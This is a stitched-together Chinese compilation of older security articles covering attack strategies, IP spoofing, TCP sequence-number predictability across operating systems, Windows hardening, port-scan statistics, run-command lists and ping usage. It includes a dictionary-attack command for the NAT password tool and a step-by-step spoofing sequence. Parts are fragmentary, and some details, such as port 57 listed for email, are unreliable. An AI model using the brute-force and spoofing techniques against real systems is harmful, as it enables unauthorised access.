网络安全知识（3）

结合所有攻击定制审计策略
　　攻击者有两个共同的特点。首先，他们将好几种不同的方法和策略集中到一次攻击中。其次，他们在一次攻击中利用好几种系统。综合应用攻击策略可以增强攻击的成功率。同时利用好几种系统使他们更不容易被捕获。

　　例如，在实施IP欺骗时，攻击者通常会先实施拒绝服务攻击以确保被攻击主机不会建立任何连接。大多数使用Man-in-the-middle的攻击者会先捕获SMB的密码，再使用L0phtCrack这样的程序进行暴力破解攻击。

　　渗透策略

　　你已经了解到那些网络设备和服务是通常遭受攻击的目标和黑客活动的攻击特征。现在，请参考下列的一些场景。它们将有助于你在审计过程中关注那些设备和服务。请记住，将这些攻击策略结合起来的攻击是最容易成功的。

　　物理接触

　　如果攻击者能够物理接触操作系统，他们便可以通过安装和执行程序来使验证机制无效。例如，攻击者可以重启系统，利用其它启动盘控制系统。由于一种文件系统可以被另一种所破坏，所以你可以使用启动盘获得有价值的信息，例如有管理权限的账号。

　　物理攻击的简单例子包括通过重新启动系统来破坏Windows95或98的屏幕锁定功能。更简单的物理攻击是该系统根本就没有进行屏幕锁定。

　　操作系统策略

　　近来，美国白宫的Web站点（http://www.whitehouse.gov）被一个缺乏经验的攻击者黑掉。攻击者侦查出该Web服务器（www1.whitehouse.gov）运行的操作系统是Solaris 7。虽然Solaris 7被成为艺术级的操作系统，但管理员并没有改变系统的缺省设置。虽然该站点的管理员设置了tripwire，但攻击者还是使用phf/ufsrestore命令访问了Web服务器。

　　较弱的密码策略

　　上面白宫网站被黑的例子可能是由于该系统管理员使用FTP来升级服务器。虽然使用FTP来更新网站并没有错，但大多数FTP会话使用明文传输密码。很明显，该系统管理员并没有意识到这种安全隐患。又由于大多数系统管理员在不同的服务上使用相同的密码，这使攻击者能够获得系统的访问权。更基本的，你可以保证/etc/passwd文件的安全。

　　NetBIOS Authentication Tool（NAT）

　　当攻击者以WindowsNT为目标时，他们通常会使用NetBIOS Authentication Tool（NAT）来测试弱的口令。这个程序可以实施字典攻击。当然它也有命令行界面，这种界面的攻击痕迹很小。而且命令行界面的程序也很好安装和使用。在使用NAT时，你必须指定三个文本文件和IP地址的范围。当然，你也可以指定一个地址。NAT使用两个文本文件来实施攻击而第三个来存储攻击结果。第一个文本文件包含一个用户列表，第二个文件中是你输入的猜测密码。

　　当使用命令行版本时，语法格式为：

　　 nat –u username.txt –p passwordlist.txt –o outputfile.txt

　　即使服务器设置了密码的过期策略和锁定，攻击者还是可以利用NAT反复尝试登录来骚扰管理员。通过简单地锁定所有已知的账号，攻击者会极大地影响服务器的访问，这也是一些系统管理员不强行锁定账号的原因。

　　较弱的系统策略

　　到此为止，你已经学习了一些外部攻击。然而，对于管理员来说最紧迫的是大多数公司都存在不好的安全策略。如果安全策略很弱或干脆没有安全策略，通常会导致弱的密码和系统策略。通常，公司并不采取简单的预防措施，比如需要非空的或有最小长度要求的密码。忽略这些限制会给攻击者留下很大的活动空间。

　　审计文件系统漏洞

　　不论你的操作系统采取何种文件系统（FAT，NTFS或NFS），每种系统都有它的缺陷。例如，缺省情况下NTFS在文件夹和共享创建之初everyone组可完全控制。由于它是操作系统的组成部分（Windows NT），因此也成为许多攻击的目标。NFS文件系统可以共享被远程系统挂接，因此这也是攻击者入侵系统的途径之一。

　　IP欺骗和劫持：实例

　　IP欺骗是使验证无效的攻击手段之一，也是如何组合攻击策略攻击网络的典型实例。IP欺骗利用了Internet开放式的网络设计和传统的建立在UNIX操作系统之间信任关系。主要的问题是使用TCP/IP协议的主机假设所有从合法IP地址发来的数据包都是有效的。攻击者可以利用这一缺陷，通过程序来发送虚假的IP包，从而建立TCP连接，攻击者可以使一个系统看起来象另一个系统。

　　许多UNIX操作系统通过rhosts和rlogin在非信任的网络上（如Internet）建立信任的连接。这种传统的技术是流行的管理工具并减轻了管理负担。通常，这种系统由于把UNIX的验证机制和IP地址使用相结合从而提供了适当的安全。然而，这种验证机制是如此的独立于IP地址不会被伪造的假设，以至于很容易被击破。

　　Non-blind spoofing 和Blind spoofing

　　Non-blind spoofing是指攻击者在同一物理网段上操纵连接。Blind spoofing是指攻击者在不同的物理网段操纵连接。后者在实施上更困难，但也时常发生。

　　进行IP欺骗的攻击者需要一些程序，包括：

　　· 一个包嗅探器

　　· 一个能够同时终止TCP连接、产生另一个TCP连接、进行IP 伪装的程序

　　IP欺骗涉及了三台主机。像先前分析的那样，使用验证的服务器必须信任和它建立连接的主机。如果缺乏天生的安全特性，欺骗是非常容易的。

　　思考下列的场景，有三台主机分别是A,B和C。A使用TCP SYN连接与合法用户B初始一个连接。但是B并没有真正参与到这次连接中，因为C已经对B实施了拒绝服务攻击。所以，虽然A认为是在与B对话，但实际上是与C对话。IP欺骗实际上组合了几种攻击手法包括对系统实施了拒绝服务攻击，还包括利用验证技术。

　　作为审计人员，你不应该说服管理员终止这种信任关系，相反，你应当建议使用防火墙规则来检测有问题的包。
TCP/IP序列号生成方法

　　TCP的Initial Sequence Number(ISN)的预测



　　正常的TCP连接基于一个三次握手(3-way handshake)，一个客户端(Client)向服务器(Server)发送一个初始化序列号ISNc， 随后，服务器相应这个客户端ACK(ISNc),并且发送自己的初始化序列号ISNs，接着，客户端响应这个ISNs（如下图），三次握手完成。

　　 C ---〉S: (ISNc)

　　 S ---〉C: ACK(ISNc)+ ISNs

　　 C ---〉S: ACK(ISNs)

　　 C ---〉S: data

　　 and / or

　　 S ---〉C: data

　　下面，我以Windows2000 Advanced Server为例，来说一下两台主机是如何进行三次握手。

　　我们可以看到：

　　1) Smartboy首先发送一个seq:32468329的包给服务器202.116.128.6。

　　2) 然后, 202.116.128.6响应主机Smartboy, 它送给Smartboy自己的

　　 seq:3333416325 而且响应Smartboy的ack:3240689240。

　　3) Smartboy再响应服务器202.116.128.6, seq:3240689240, ack:3333416326。

　　 三次握手完毕，两台几建立起连接。

　　 可以看出，在三次握手协议中，Clinet一定要监听服务器发送过来的ISNs, TCP使用的sequence number是一个32位的计数器，从0-4294967295。TCP为每一个连接选择一个初始序号ISN，为了防止因为延迟、重传等扰乱三次握手，ISN不能随便选取，不同系统有不同算法。理解TCP如何分配ISN以及ISN随时间变化的规律，对于成功地进行IP欺骗攻击很重要。

　　在Unix系统里，基于远程过程调用RPC的命令，比如rlogin、rcp、rsh等等，根据/etc/hosts.equiv以及$HOME/.rhosts文件进行安全校验，其实质是仅仅根据源IP地址进行用户身份确认，以便允许或拒绝用户RPC。这就给与了那些攻击者进行IP地址欺骗的机会。

　　 让我们看X是如何冒充T来欺骗S，从而建立一个非法连接 ：

　　 X---->S: SYN(ISNx ) , SRC = T

　　 S---->T: SYN(ISNs ) , ACK(ISNT) （*）

　　 X---->S: ACK(ISNs+1 ) , SRC = T （**）

　　 X---->S: ACK(ISNs +1) , SRC = T, 攻击命令（可能是一些特权命令）

　　 但是，T必须要在第（**）中给出ISNs, 问题是ISNs在第（*）步中发给了T(X当然很难截取到)，幸运的是，TCP协议有一个约定: ISN变量每秒增加250,000次，这个增加值在许多版本比较旧的操作系统中都是一个常量，在FreeBSD4.3中是125000次每秒，这就给X一个可乘之机。

网络安全知识（6）


delay coordinates分析法的意义

　　站在攻击者的立场，他是千方百计地想缩小搜索空间，他希望先搜索一些最可能的值，然后再去搜索其它可能性没那么大的值。通过delay coordinates，他可以看去观察ISN数列的特征，如果，按照上面的方法构造的空间模型Ａ呈现很明显的空间轮廓，如一个正方体，一个圆柱体，或者一个很小的区域，那么ISN很可能就是这个空间模型Ａ中的一点，搜索空间就会可以从一个巨大的三维空间缩小到一个模型Ａ。看一下一个设计得很好的PRNG（输出为32位）：...2179423068, 2635919226, 2992875947, 3492493181, 2448506773, 2252539982, 2067122333, 1029730040, 335648555, 427819739...


　　RFC 1948要求我们用31位的输出，但是，32位的搜索空间比31位的要大一倍，所以，在后面的PRNG的设计中，我采用了32位的输出。

　　　下面，我们来看一下各种典型的空间模型以及对它们的评价。



　　从空间特性可以看出，某些区域的值互相重叠，某些地方的空间形状很明显，呈针状型，这种PRNG设计得不好，重叠特性很强，攻击者可以从左图分析推断可能性比较大的重叠区域去搜索，这样可以大大减少搜索的难度。



　　这种PRNG参杂了一些可以预测的随机种子，导致空间模型呈现很明显的片状。攻击者可以根据前面的一些ISN来推测后面的ISN。


　　这种PRNG产生的随机数序列之间的差值非常小，但是，它的分布特性非常好。所以，虽然，它并没有扩展到整个空间，但是，它比上面几种模型要好的多。攻击者攻击的成功率要少得多。


　　这个PRNG是以计算机时钟为随机源的。它的ISN值都分布在三个很明显的面上。三个面都在模型的中间有一个汇聚点。这样的PRNG设计的非常差，所以，我们在设计PRNG的时候，不能只是以时钟作为随机源。

各种操作系统的TCP ISN生成器的安全性比较

　　Windwos 98 SE


　　但很难明白为什么Windows 98的算法更弱。我们看到R1为0，也就是说，A的空间特性太明显，以致M集只需要一个点就可以算出seq[t]。我们看到，Windows 98的R2小于Windows 95的R2，换言之，Windows 98的seq[t]的搜索代价更少。

　　Windows NT4 SP3，Windows SP6a和Windows 2000


　　Windows NT4 SP3在ISN的PNRG算法也是非常弱的，成功率接近100%。Windows 2000和Windows NT4 SP6a的TCP 序列号有着相同的可猜测性。危险程度属于中到高的范围。虽然，我们在图上看不到很明显的3D结构化特征，但是，12%和15%对攻击者来说，已经是一个很满意的结果。

　　FreeBSD 4.2,OpenBSD 2.8和OpenBSD-current



　　OpenBSD-current的PRNG 输出为31-bit,也就是说，△seq[t]的值域范围可以是231 –1，意味着,y,z值域也很大，这对使我们很难确定M集，经过我们的处理后，可以看到一个云状物(见上图)，它的R1半径很大，而且分布均匀，不呈现任何的空间结构化特性，很难对它进行分析。

　　Linux 2.2


　　Linux 2.2的TCP/IP序列号的可分析性也是很少，比起OpenBSD-current,它的PRNG的输出宽度只有24bit，但是，对抵御攻击已经足够了。Linux是按照RFC 1948规范的。它的HASH函数从实现来说，应该是没有什么的漏洞，而且，它应该是引入了外部随机源。

　　Solaris

　　Solaris的内核参数tcp_strong_iss有三个值，当tcp_strong_iss=0时，猜中序列号的成功率是100%；当tcp_strong_iss=1时，Solaris 7和Solaris 8一样，都能产生一些特性相对较好的序列号。


　　tcp_strong_iss=2时，依据Sun Microsystem的说法，系统的产生的ISN值非常可靠，不可预测。通过观察采样值的低位值的变化，可以相信它的PRNG的设计采用了RFC 1948规范，正如Solaris的白皮书所提到的。


　　但是，我们观察到，Solaris7(tcp_strong_iss=2)虽然使用了RFC 1948,但是，仍然相当的弱，究其原因，是因为Solaris没有使用外部随机源，而且也没有在一段时间之后重算

。由一些Solaris系统动态分配IP地址的主机群要特别小心，因为Solaris在启动之后，一直都不会变(这一点与Linux不同)，于是，攻击者在合法拥有某个IP地址的时候，他可以在TCP会话期间对序列号进行大量的采样，然后，当这个IP地址又动态地分配给其他人的时候，他就可以进行攻击（在Clinet-Server结构的网络系统中要尤为注意，因为，许多应用都是分配固定的端口进行通讯）。
获得信息

　　一旦攻击者获得root的权限，他将立即扫描服务器的存储信息。例如，在人力资源数据库中的文件，支付账目数据库和属于上层管理的终端用户系统。在进行这一阶段的控制活动时，攻击者在脑海中已经有明确的目标。这一阶段的信息获取比侦查阶段的更具有针对性，该信息只会导致重要的文件和信息的泄漏。这将允许攻击者控制系统。

　　攻击者获得信息的一种方法是操纵远程用户的Web浏览器。大多数的公司并没有考虑到从HTTP流量带来的威胁，然而，Web浏览器会带来很严重的安全问题。这种问题包括Cross-frame browsing bug和Windows spoofing以及Unicode等。浏览器容易发生缓冲区溢出的问题，允许攻击者对运行浏览器的主机实施拒绝服务攻击。一旦攻击者能够在局部使系统崩溃，他们便可以运行脚本程序来渗透和控制系统。

　　Cross-frame browsing bug允许怀有恶意的Web站点的制作者创建可以从用户计算机上获得信息的Web页面。这种情况出现在4.x和5.x版本的Netscape和Microsoft浏览器上，这种基于浏览器的问题只会发生在攻击者已经知道文件和目录的存储位置时。这种限制看起来不严重，但实际上并非如此。其实，任何攻击者都清楚地知道缺省情况下UNIX操作系统的重要文件存放在（etc）目录下，Windows NT的文件在（winnt）目录下，IIS在（inetpubwwwroot）目录下等等。

防范非系统用户破坏


第一招：屏幕保护



在Windows中启用了屏幕保护之后，只要我们离开计算机(或者不操作计算机)的时间达到预设的时间，系统就会自动启动屏幕保护程序，而当用户移动鼠标或敲击键盘想返回正常工作状态时，系统就会打开一个密码确认框，只有输入正确的密码之后才能返回系统，不知道密码的用户将无法进入工作状态，从而保护了数据的安全。



提示：部分设计不完善的屏幕保护程序没有屏蔽系统的“Ctrl+Alt+Del”的组合键，因此需要设置完成之后测试一下程序是否存在这个重大Bug。



不过，屏幕保护最快只能在用户离开1分钟之后自动启动，难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗？其实我们只要打开Windows安装目录里面的system子目录，然后找到相应的屏幕保护程序(扩展名是SCR)，按住鼠标右键将它们拖曳到桌面上，选择弹出菜单中的“在当前位置创建快捷方式”命令，在桌面上为这些屏幕保护程序建立一个快捷方式。此后，我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。



第二招：巧妙隐藏硬盘



在“按Web页”查看方式下，进入Windows目录时都会弹出一句警告信息，告诉你这是系统文件夹如果“修改该文件夹的内容可能导致程序运行不正常，要查看该文件夹的内容，请单击显示文件”，这时单击“显示文件”就可以进入该目录了。原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件，之前必须在文件夹选项中单击“查看”标签，选择“显示所有文件”，这样就可以看见这两个文件了)。再按“F5”键刷新一下，看看发生了什么，是不是和进入Windows目录时一样。



接下来我们用“记事本”打开folder.htt，这是用HTML语言编写的一个文件，发挥你的想像力尽情地修改吧。如果你不懂HTML语言也没关系，先找到“显示文件”将其删除，找到“修改该文件夹的内可能导致程序运行不正常，要查看该文件夹的内容，请单击显示文件”，将其改为自己喜欢的文字，例如“安全重地，闲杂人等请速离开”(如图1)，将“要查看该文件夹的内容，请单击”改为“否则，后果自负!”，接着向下拖动滑块到倒数第9行，找到“(file&://%TEMPLATEDIR%＼wvlogo.gif)”这是显示警告信息时窗口右下角齿轮图片的路径，将其改为自己图片的路径，例如用“d:＼tupian＼tupian1.jpg”替换“//”后面的内容，记住这里必须将图片的后缀名打出，否则将显示不出图片。当然，你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果，然后只要将原文件拷贝到下面这段文字的后面，覆盖掉原文件中“～”之间的内容就可以了。



*This file was automatically generated by Microsoft Internet EXPlorer 5.0



*using the file %THISDIRPATH%＼folder.htt.



保存并退出，按“F5”键刷新一下，是不是很有个性?接下来要作的就是用“超级兔子”将你所要的驱动器隐藏起来，不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的，就是干脆将folder.htt原文件中“～”之间的内容全部删除，这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象，使其中的文件更安全。







图1



第三招：禁用“开始”菜单命令



在Windows 2000/XP中都集成了组策略的功能，通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的安全性。运行“开始→运行”命令，在“运行”对话框的“打开”栏中输入“gpedit.msc”，然后单击“确定”按钮即可启动Windows XP组策略编辑器。在“本地计算机策略”中，逐级展开“用户配置→管理模板→任务栏和开始菜单”分支，在右侧窗口中提供了“任务栏”和“开始菜单”的有关策略。



在禁用“开始”菜单命令的时候，在右侧窗口中，提供了删除“开始”菜单中的公用程序组、“我的文档”图标、“文档”菜单、“网上邻居”图标等策略。清理“开始”菜单的时候只要将不需要的菜单项所对应的策略启用即可，比如以删除“我的文档”图标为例，具体操作步骤为：



1)在策略列表窗口中用鼠标双击“从开始菜单中删除我的文档图标”选项。



2)在弹出窗口的“设置”标签中，选择“已启用”单选按钮，然后单击“确定”即可。



第四招：桌面相关选项的禁用



Windows XP的桌面就像你的办公桌一样，有时需要进行整理和清洁。有了组策略编辑器之后，这项工作将变得易如反掌，只要在“本地计算机策略”中展开“用户配置→管理模板→桌面”分支，即可在右侧窗口中显示相应的策略选项。



1)隐藏桌面的系统图标



倘若隐藏桌面上的系统图标，传统的方法是通过采用修改注册表的方式来实现，这势必造成一定的风险性，采用组策略编辑器，即可方便快捷地达到此目的。



若要隐藏桌面上的“网上邻居”和“Internet EXPlorer”图标，只要在右侧窗口中将“隐藏桌面上网上邻居图标”和“隐藏桌面上的Internet EXPlorer图标”两个策略选项启用即可。如果隐藏桌面上的所有图标，只要将“隐藏和禁用桌面上的所有项目”启用即可。当启用了“删除桌面上的我的文档图标”和“删除桌面上的我的电脑图标”两个选项以后，“我的电脑”和“我的文档”图标将从你的电脑桌面上消失了。如果在桌面上你不再喜欢“回收站”这个图标，那么也可以把它给删除，具体方法是将“从桌面删除回收站”策略项启用。



2)禁止对桌面的某些更改



如果你不希望别人随意改变计算机桌面的设置，请在右侧窗口中将“退出时不保存设置”这个策略选项启用。当你启用这个了设置以后，其他用户可以对桌面做某些更改，但有些更改，诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。



第五招：禁止访问“控制面板”



如果你不希望其他用户访问计算机的控制面板，你只要运行组策略编辑器，并在左侧窗口中展开“本地计算机策略→用户配置→管理模板→控制面板”分支，然后将右侧窗口的“禁止访问控制面板”策略启用即可。



此项设置可以防止控制面板程序文件的启动，其结果是他人将无法启动控制面板或运行任何控制面板项目。另外，这个设置将从“开始”菜单中删除控制面板，同时这个设置还从Windows资源管理器中删除控制面板文件夹。



提示：如果你想从上下文菜单的属性项目中选择一个“控制面板”项目，会出现一个消息，说明该设置防止这个操作。



第六招：设置用户权限



当多人共用一台计算机时，在Windows XP中设置用户权限，可以按照以下步骤进行：



1)运行组策略编辑器程序。



2)在编辑器窗口的左侧窗口中逐级展开“计算机配置→Windows设置→安全设置→本地策略→用户权限指派”分支。



3)双击需要改变的用户权限，单击“添加用户或组”按钮，然后双击想指派给权限的用户账号，最后单击“确定”按钮退出。



第七招：文件夹设置审核



Windows XP可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件，而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的安全。为文件和文件夹设置审核的步骤如下：



1)在组策略窗口中，逐级展开右侧窗口中的“计算机配置→Windows设置→安全设置→本地策略”分支，然后在该分支下选择“审核策略”选项。



2)在右侧窗口中用鼠标双击“审核对象访问”选项，在弹出的“本地安全策略设置”窗口中将“本地策略设置”框内的“成功”和“失败”复选框都打上勾选标记(如图2)，然后单击“确定”按钮。



3)用鼠标右键单击想要审核的文件或文件夹，选择弹出菜单的“属性”命令，接着在弹出的窗口中选择“安全”标签。



4)单击“高级”按钮，然后选择“审核”标签。



5)根据具体情况选择你的操作：



倘若对一个新组或用户设置审核，可以单击“添加”按钮，并且在“名称”框中键入新用户名，然后单击“确定”按钮打开“审核项目”对话框。



要查看或更改原有的组或用户审核，可以选择用户名，然后单击“查看/编辑”按钮。



要删除原有的组或用户审核，可以选择用户名，然后单击“删除”按钮即可。



6)如有必要的话，在“审核项目”对话框中的“应用到”列表中选取你希望审核的地方。



7)如果想禁止目录树中的文件和子文件夹继承这些审核项目，选择“仅对此容器内的对象和/或容器应用这些审核项”复选框。



注意：必须是管理员组成员或在组策略中被授权有“管理审核和安全日志”权限的用户可以审核文件或文件夹。在Windows XP审核文件、文件夹之前，你必须启用组策略中“审核策略”的“审核对象访问”。否则，当你设置完文件、文件夹审核时会返回一个错误消息，并且文件、文件夹都没有被审核

黑客扫描特征及易受攻击的端口

黑客攻击前先扫描
　　如今，网络上的黑客攻击已经成了家常便饭，自动攻击和计算机蠕虫病毒正以闪电般的速度在网络上蔓延。 今年7月10日到7月23日，Tel Aviv大学的开放端口就曾经被扫描达96000次，它抵挡了来自99个国家，82000名黑客熗林弹雨般的攻击。就此，ForeScout公司开发了一种叫做ActiveScout的防入侵技术，它有助于查明黑客的企图并防止网络攻击。据它观测，现在具有黑客行为的攻击与扫描具有以下特征：

　　约90%的攻击来自蠕虫

　　由于蠕虫病毒具有自动攻击和快速繁殖的特性，因此，它占网络攻击的大约90%，通常是系统扫描或同步攻击。其中，大部分网络攻击的来源地是美国。根据ActiveScout的数据，这些蠕虫病毒繁殖迅速，扫描和攻击相隔的时间很短，因此无法人为控制。蠕虫病毒也具有反复攻击的特性，它们会寻找同一端口并大规模入侵这些端口。如果人们不对蠕虫病毒采取防范措施，攻击/扫描的成功率将达到30%，即在10次扫描中，有3次能获得结果并可进行攻击。

　　96%的扫描集中在端口

　　端口扫描在网络扫描中大约占了96%，UDP（User Datagram Protocol）服务次之，占3.7%。除了这两种之外，剩余的0.3%是用户名和密码扫描、NetBIOS域登录信息和SNMP管理数据等。Tel Aviv大学已经开始努力防止蠕虫攻击和对NetBIOS弱点的网络攻击，因为这些攻击可能会感染所有的Windows系统。同时，在发送流量之前，要求ISP对所有的NetBIOS流量进行过滤。

　　有调查表明：在过去的半年中，存在危险性的Internet流量数量已经增加了2倍；暗噪声主要是由网络探测引起的，45%到55%的可疑行为都是黑客对计算机的扫描造成的；大多数攻击都是自动的，小型程序攻击通常来自以前中毒的计算机；黑客攻击这些网络的主要原因是寻找他们能用来传播垃圾邮件、为非法文件寻找特别存储空间的计算机，或者占用可用于下一次攻击的机器。
10种端口最易受攻击

　　某组织I-Trap曾经收集了来自24个防火墙12小时工作的数据，这些防火墙分别位于美国俄亥俄州24个企业内网和本地ISP所提供的Internet主干网之间。其间，黑客攻击端口的事件有12000次之多，下表是攻击的详细情况。

No. 端口号 服务 攻击事件数 说 明
1 135和445 windows rpc 分别为42次和457次 表明可能感染了最新的windows病毒或蠕虫病毒
2 57 email 56次 黑客利用fx工具对这个端口进行扫描，寻找微软web服务器弱点
3 1080，3128，
6588，8080 代理服务 分别为64、21、21、163次 表示黑客正在进行扫描
4 25 smtp服务 56次 黑客探测smtp服务器并发送垃圾邮件信号
5 10000＋ 未注册的服务 376次 攻击这些端口通常会返回流量，原因可能是计算机或防火墙配置不当，或者黑客模拟返回流量进行攻击
6 161　snmp服务 937次 成功获得snmp可能会使黑客完全控制路由器、防火墙或交换机
7 1433　微软sql服务 147次 表明计算机可能已经感染了sql slammer蠕虫病毒
8 53　dns 1797次 表明防火墙或lan配置可能有问题
9 67　引导程序 23次 表明设备可能配置不当　
开始..运行..命令集合


gpedit.msc-----组策略 sndrec32-------录音机
Nslookup-------IP地址侦测器 explorer-------打开资源管理器
logoff---------注销命令 tsshutdn-------60秒倒计时关机命令
lusrmgr.msc----本机用户和组 services.msc---本地服务设置
oobe/msoobe /a----检查XP是否激活 notepad--------打开记事本
cleanmgr-------垃圾整理 net start messenger----开始信使服务
compmgmt.msc---计算机管理 net stop messenger-----停止信使服务
conf-----------启动netmeeting dvdplay--------DVD播放器
charmap--------启动字符映射表 diskmgmt.msc---磁盘管理实用程序
calc-----------启动计算器 dfrg.msc-------磁盘碎片整理程序
chkdsk.exe-----Chkdsk磁盘检查 devmgmt.msc--- 设备管理器
regsvr32 /u *.dll----停止dll文件运行 drwtsn32------ 系统医生
rononce -p ----15秒关机 dxdiag---------检查DirectX信息
regedt32-------注册表编辑器 Msconfig.exe---系统配置实用程序
rsop.msc-------组策略结果集 mem.exe--------显示内存使用情况
regedit.exe----注册表 winchat--------XP自带局域网聊天
progman--------程序管理器 winmsd---------系统信息
perfmon.msc----计算机性能监测程序 winver---------检查Windows版本
sfc /scannow-----扫描错误并复原
taskmgr-----任务管理器（2000／xp／2003）

转自草盟网络

开始-运行 系列命令

这些东西平时不好找,看到了,就不要错过...
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介（安装完成后出现的漫游xp程序）
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具，系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略

PING命令及使用技巧


Ping命令的使用技巧

Ping是个使用频率极高的实用程序，用于确定本地主机是否能与另一台主机交换（发送与接收）数据报。根据返回的信息，我们就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是：成功地与另一台主机进行一次或两次数 据报交换并不表示TCP/IP配置就是正确的，我们必须执行大量的本地主机与远程主机的数据报交换，才能确信TCP/IP的正确性。

　　简单的说，Ping就是一个测试程序，如果Ping运行正确，我们大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故障，从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送，Ping也被某些别有用心的人作为DDOS（拒绝服务攻击）的工具，例如许多大型的网站就是被黑客利用数百台可以高速接入互联网的电脑连续发送大量Ping数据报而瘫痪的。

　　按照缺省设置，Windows上运行的Ping命令发送4个ICMP（网间控制报文协议）回送请求，每个32字节数据，如果一切正常，我们应能得到4个回送应答。 Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络连接速度比较快。Ping还能显示TTL（Time To Live存在时间）值，我们可以通过TTL值推算一下数据包已经通过了多少个路由器：源地点TTL起始值（就是比返回TTL略大的一个2的乘方数）-返回时TTL值。例如，返回TTL值为119，那么可以推算数据报离开源地址的TTL起始值为128，而源地点到目标地点要通过9个路由器网段（128-119）；如果返回TTL值为246，TTL起始值就是256，源地点到目标地点要通过9个路由器网段。

　　1、通过Ping检测网络故障的典型次序

　　正常情况下，当我们使用Ping命令来查找问题所在或检验网络运行情况时，我们需要使用许多Ping命令，如果所有都运行正确，我们就可以相信基本的连通性和配置参数没有问题；如果某些Ping命令出现运行故障，它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障：

　　·ping 127.0.0.1
　　这个Ping命令被送到本地计算机的IP软件，该命令永不退出该计算机。如果没有做到这一点，就表示TCP/IP的安装或运行存在某些最基本的问题。

　　·ping 本机IP
　　这个命令被送到我们计算机所配置的IP地址，我们的计算机始终都应该对该Ping命令作出应答，如果没有，则表示本地配置或安装存在问题。出现此问题时，局域网用户请断开网络电缆，然后重新发送该命令。如果网线断开后本命令正确，则表示另一台计算机可能配置了相同的IP地址。

　　·ping 局域网内其他IP
　　这个命令应该离开我们的计算机，经过网卡及网络电缆到达其他计算机，再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码（进行子网分割时，将IP地址的网络部分与主机部分分开的代码）不正确或网卡配置错误或电缆系统有问题。

　　·ping 网关IP
　　这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够作出应答。

　　·ping 远程IP
　　如果收到4个应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS会有问题）。

　　·ping localhost
　　localhost是个作系统的网络保留名，它是127.0.0.1的别名，每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内，则表示主机文件（/Windows/host）中存在问题。

　　·ping www.xxx.com（如www.yesky.com 天极网）
　　对这个域名执行Ping www.xxx.com 地址，通常是通过DNS 服务器 如果这里出现故障，则表示DNS服务器的IP地址配置不正确或DNS服务器有故障（对于拨号上网用户，某些ISP已经不需要设置DNS服务器了）。顺便说一句：我们也可以利用该命令实现域名对IP地址的转换功能。

　　如果上面所列出的所有Ping命令都能正常运行，那么我们对自己的计算机进行本地和远程通信的功能基本上就可以放心了。但是，这些命令的成功并不表示我们所有的网络配置都没有问题，例如，某些子网掩码错误就可能无法用这些方法检测到。

　　2、Ping命令的常用参数选项

　　·ping IP Ct
　　连续对IP地址执行Ping命令，直到被用户以Ctrl+C中断。

　　·ping IP -l 3000
　　指定Ping命令中的数据长度为3000字节，而不是缺省的32字节。

